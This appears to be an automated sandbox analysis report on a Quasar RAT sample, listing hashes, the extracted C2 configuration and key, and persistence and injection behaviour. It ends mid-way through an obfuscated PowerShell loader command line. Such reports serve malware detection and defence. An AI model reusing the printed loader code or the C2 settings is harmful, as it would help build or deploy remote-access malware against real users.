Analysis
-
max time kernel
1800s -
max time network
1800s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
02-05-2024 20:58
Behavioral task
behavioral1
Sample
R0X-Built.exe
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
R0X-Built.exe
Resource
win10v2004-20240419-en
General
-
Target
R0X-Built.exe
-
Size
409KB
-
MD5
a0f5aa5764c4f66eee82f857f9f447b6
-
SHA1
3c3a780d020cb3eb3088223443fe813abb95dccd
-
SHA256
43c6b9b6c241dbd6ad1bde7980026235373374d5e836fb6c794354a15e678ef3
-
SHA512
458c03ae490e409598b8e9e89911b0757fb61411fbc45a60ecefed3c13d0fc96b7bc205afe1fb3e0f7585eb163f102754ec9259691eca1bfa00b028f74eb8384
-
SSDEEP
6144:RMX2pJAJcC0B61K6qZ1fQ57P/EwXhb4azmosb+lfXdOIFyoOOfTA3pwF:lpyJcC+uK6qZ1G8QJjbfNOSOObA3pwF
Malware Config
Extracted
quasar
3.1.5
Slave
even-lemon.gl.at.ply.gg:33587
$Sxr-3vDee7FzoJnhqjuE3n
-
encryption_key
KaNwItdY6wlv5nCN4prL
-
install_name
$srr-powershell.exe
-
log_directory
Logs
-
reconnect_delay
1000
-
startup_key
$srr-powershell
-
subdirectory
Windows
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/312-1-0x00000000006F0000-0x000000000075C000-memory.dmp family_quasar C:\Users\Admin\AppData\Roaming\Windows\$srr-powershell.exe family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3544 created 592 3544 powershell.EXE winlogon.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
$srr-powershell.exeinstall.exepid process 604 $srr-powershell.exe 4460 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 14 IoCs
Processes:
powershell.EXEsvchost.exeOfficeClickToRun.exesvchost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83 svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.EXEdescription pid process target process PID 3544 set thread context of 1300 3544 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeSCHTASKS.exepid process 796 schtasks.exe 5008 schtasks.exe 4284 SCHTASKS.exe -
Modifies data under HKEY_USERS 61 IoCs
Processes:
powershell.EXEOfficeClickToRun.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Thu, 02 May 2024 21:00:18 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={5EBEFE70-DFDA-4E14-92CD-1F42C9391953}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1714683616" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.EXEdllhost.exe$srr-powershell.exepid process 3544 powershell.EXE 3544 powershell.EXE 3544 powershell.EXE 3544 powershell.EXE 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 604 $srr-powershell.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe 1300 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
R0X-Built.exepowershell.EXE$srr-powershell.exedllhost.exesvchost.exeExplorer.EXEsvchost.exedescription pid process Token: SeDebugPrivilege 312 R0X-Built.exe Token: SeDebugPrivilege 3544 powershell.EXE Token: SeDebugPrivilege 604 $srr-powershell.exe Token: SeDebugPrivilege 3544 powershell.EXE Token: SeDebugPrivilege 1300 dllhost.exe Token: SeAuditPrivilege 2508 svchost.exe Token: SeShutdownPrivilege 3388 Explorer.EXE Token: SeCreatePagefilePrivilege 3388 Explorer.EXE Token: SeAuditPrivilege 2508 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1572 svchost.exe Token: SeLoadDriverPrivilege 1572 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1572 svchost.exe Token: SeIncreaseQuotaPrivilege 1572 svchost.exe Token: SeSecurityPrivilege 1572 svchost.exe Token: SeTakeOwnershipPrivilege 1572 svchost.exe Token: SeLoadDriverPrivilege 1572 svchost.exe Token: SeSystemtimePrivilege 1572 svchost.exe Token: SeBackupPrivilege 1572 svchost.exe Token: SeRestorePrivilege 1572 svchost.exe Token: SeShutdownPrivilege 1572 svchost.exe Token: SeSystemEnvironmentPrivilege 1572 svchost.exe Token: SeUndockPrivilege 1572 svchost.exe Token: SeManageVolumePrivilege 1572 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1572 svchost.exe Token: SeIncreaseQuotaPrivilege 1572 svchost.exe Token: SeSecurityPrivilege 1572 svchost.exe Token: SeTakeOwnershipPrivilege 1572 svchost.exe Token: SeLoadDriverPrivilege 1572 svchost.exe Token: SeSystemtimePrivilege 1572 svchost.exe Token: SeBackupPrivilege 1572 svchost.exe Token: SeRestorePrivilege 1572 svchost.exe Token: SeShutdownPrivilege 1572 svchost.exe Token: SeSystemEnvironmentPrivilege 1572 svchost.exe Token: SeUndockPrivilege 1572 svchost.exe Token: SeManageVolumePrivilege 1572 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1572 svchost.exe Token: SeIncreaseQuotaPrivilege 1572 svchost.exe Token: SeSecurityPrivilege 1572 svchost.exe Token: SeTakeOwnershipPrivilege 1572 svchost.exe Token: SeLoadDriverPrivilege 1572 svchost.exe Token: SeSystemtimePrivilege 1572 svchost.exe Token: SeBackupPrivilege 1572 svchost.exe Token: SeRestorePrivilege 1572 svchost.exe Token: SeShutdownPrivilege 1572 svchost.exe Token: SeSystemEnvironmentPrivilege 1572 svchost.exe Token: SeUndockPrivilege 1572 svchost.exe Token: SeManageVolumePrivilege 1572 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1572 svchost.exe Token: SeIncreaseQuotaPrivilege 1572 svchost.exe Token: SeSecurityPrivilege 1572 svchost.exe Token: SeTakeOwnershipPrivilege 1572 svchost.exe Token: SeLoadDriverPrivilege 1572 svchost.exe Token: SeSystemtimePrivilege 1572 svchost.exe Token: SeBackupPrivilege 1572 svchost.exe Token: SeRestorePrivilege 1572 svchost.exe Token: SeShutdownPrivilege 1572 svchost.exe Token: SeSystemEnvironmentPrivilege 1572 svchost.exe Token: SeUndockPrivilege 1572 svchost.exe Token: SeManageVolumePrivilege 1572 svchost.exe Token: SeAssignPrimaryTokenPrivilege 1572 svchost.exe Token: SeIncreaseQuotaPrivilege 1572 svchost.exe Token: SeSecurityPrivilege 1572 svchost.exe Token: SeTakeOwnershipPrivilege 1572 svchost.exe Token: SeLoadDriverPrivilege 1572 svchost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
R0X-Built.exe$srr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 312 wrote to memory of 5008 312 R0X-Built.exe schtasks.exe PID 312 wrote to memory of 5008 312 R0X-Built.exe schtasks.exe PID 312 wrote to memory of 5008 312 R0X-Built.exe schtasks.exe PID 312 wrote to memory of 604 312 R0X-Built.exe $srr-powershell.exe PID 312 wrote to memory of 604 312 R0X-Built.exe $srr-powershell.exe PID 312 wrote to memory of 604 312 R0X-Built.exe $srr-powershell.exe PID 312 wrote to memory of 4460 312 R0X-Built.exe install.exe PID 312 wrote to memory of 4460 312 R0X-Built.exe install.exe PID 312 wrote to memory of 4460 312 R0X-Built.exe install.exe PID 312 wrote to memory of 4284 312 R0X-Built.exe SCHTASKS.exe PID 312 wrote to memory of 4284 312 R0X-Built.exe SCHTASKS.exe PID 312 wrote to memory of 4284 312 R0X-Built.exe SCHTASKS.exe PID 604 wrote to memory of 796 604 $srr-powershell.exe schtasks.exe PID 604 wrote to memory of 796 604 $srr-powershell.exe schtasks.exe PID 604 wrote to memory of 796 604 $srr-powershell.exe schtasks.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 3544 wrote to memory of 1300 3544 powershell.EXE dllhost.exe PID 1300 wrote to memory of 592 1300 dllhost.exe winlogon.exe PID 1300 wrote to memory of 648 1300 dllhost.exe lsass.exe PID 1300 wrote to memory of 744 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 908 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1000 1300 dllhost.exe dwm.exe PID 1300 wrote to memory of 352 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 384 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 496 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 600 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1104 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1136 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1192 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1236 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1244 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1260 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1412 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1436 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1476 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1548 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1588 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1620 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1692 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1708 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1828 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1852 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1900 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1928 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 1628 1300 dllhost.exe spoolsv.exe PID 1300 wrote to memory of 1572 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2096 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2248 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2484 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2492 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2508 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2680 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2696 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2724 1300 dllhost.exe sysmon.exe PID 1300 wrote to memory of 2744 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2756 1300 dllhost.exe svchost.exe PID 1300 wrote to memory of 2820 1300 dllhost.exe sihost.exe PID 1300 wrote to memory of 2844 1300 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:592
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:1000
-
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{d3b741a8-8431-4656-9557-5c63bd931902}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1300
-
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:648
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay1⤵PID:744
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k dcomlaunch -s LSM1⤵PID:908
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:352
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s DsmSvc1⤵
- Modifies data under HKEY_USERS
PID:384
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts1⤵PID:496
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService1⤵PID:600
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵PID:1104
-
c:\windows\system32\taskhostw.exetaskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}2⤵PID:3044
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JCxDTYIJTPkZ{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$iewzmbwngvzOaM,[Parameter(Position=1)][Type]$MQzoQiEWiz)$igNZvGpFOaQ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+''+'l'+'ec'+'t'+''+'e'+''+[Char](100)+'D'+'e'+''+[Char](108)+''+'e'+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+'m'+'o'+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+'u'+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+''+'e'+'l'+'e'+''+'g'+''+'a'+''+[Char](116)+'eT'+[Char](121)+'p'+'e'+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss'+','+'P'+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c,'+[Char](83)+'e'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+','+[Char](65)+'n'+'s'+''+[Char](105)+'C'+'l'+''+[Char](97)+'s'+'s'+''+','+''+[Char](65)+'ut'+[Char](111)+'C'+'l'+''+[Char](97)+'s'+[Char](115)+'',[MulticastDelegate]);$igNZvGpFOaQ.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+'cialNa'+'m'+'e,H'+'i'+''+[Char](100)+''+[Char](101)+'B'+'y'+'S'+'i'+''+'g'+','+[Char](80)+''+'u'+'b'+'l'+'i'+'c'+'',[Reflection.CallingConventions]::Standard,$iewzmbwngvzOaM).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'t'+'i'+''+'m'+'e'+[Char](44)+'M'+'a'+''+'n'+''+'a'+'g'+[Char](101)+''+'d'+'');$igNZvGpFOaQ.DefineMethod('In'+'v'+''+[Char](111)+''+'k'+''+'e'+'',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+'c'+','+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+'Si'+[Char](103)+''+[Char](44)+'N'+'e'+''+[Char](119)+''+'S'+''+[Char](108)+''+'o'+'t,'+[Char](86)+'i'+'r'+''+[Char](116)+''+'u'+''+[Char](97)+''+'l'+'',$MQzoQiEWiz,$iewzmbwngvzOaM).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+'e'+',M'+[Char](97)+'n'+[Char](97)+''+[Char](103)+'ed');Write-Output $igNZvGpFOaQ.CreateType();}$tNLCpkANgpasC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+'s'+''+[Char](116)+''+'e'+'m'+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+'i'+[Char](99)+'ro'+[Char](115)+''+'o'+''+[Char](102)+''+'t'+'.W'+[Char](105)+'n3'+[Char](50)+''+'.'+''+'U'+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'N'+''+[Char](97)+''+'t'+''+[Char](105)+'v'+'e'+''+'M'+'e'+[Char](116)+'hod'+'s'+'');$yoBbRdKqOjhWhI=$tNLCpkANgpasC.GetMethod(''+'G'+''+[Char](101)+'t'+'P'+''+'r'+''+[Char](111)+''+[Char](99)+'Add'+'r'+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+'S'+''+'t'+'a'+'t'+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$jJiNDXTJQMVZhwCNKMU=JCxDTYIJTPkZ @([String])([IntPtr]);$pCUWtQpbbadpCQxpwMtCPQ=JCxDTYIJTPkZ @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$rLtlCoGEQfm=$tNLCpkANgpasC.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+'o'+[Char](100)+'u'+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+[Char](100)+'l'+'e'+'').Invoke($Null,@([Object]('k'+'e'+''+'r'+''+[Char](110)+''+'e'+''+[Char](108)+''+[Char](51)+'2'+[Char](46)+'d'+'l'+'l')));$kZbjChfNHhZZlw=$yoBbRdKqOjhWhI.Invoke($Null,@([Object]$rLtlCoGEQfm,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+'L'+[Char](105)+''+[Char](98)+'ra'+[Char](114)+''+[Char](121)+'A')));$WCAkmrMLoTGQTYyTC=$yoBbRdKqOjhWhI.Invoke($Null,@([Object]$rLtlCoGEQfm,[Object](''+[Char](86)+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+'l'+'Pr'+'o'+''+'t'+''+[Char](101)+''+[Char](99)+''+'t'+'')));$xBwGqyT=[Runtime.InteropServices.Marshal]::GetDelegateF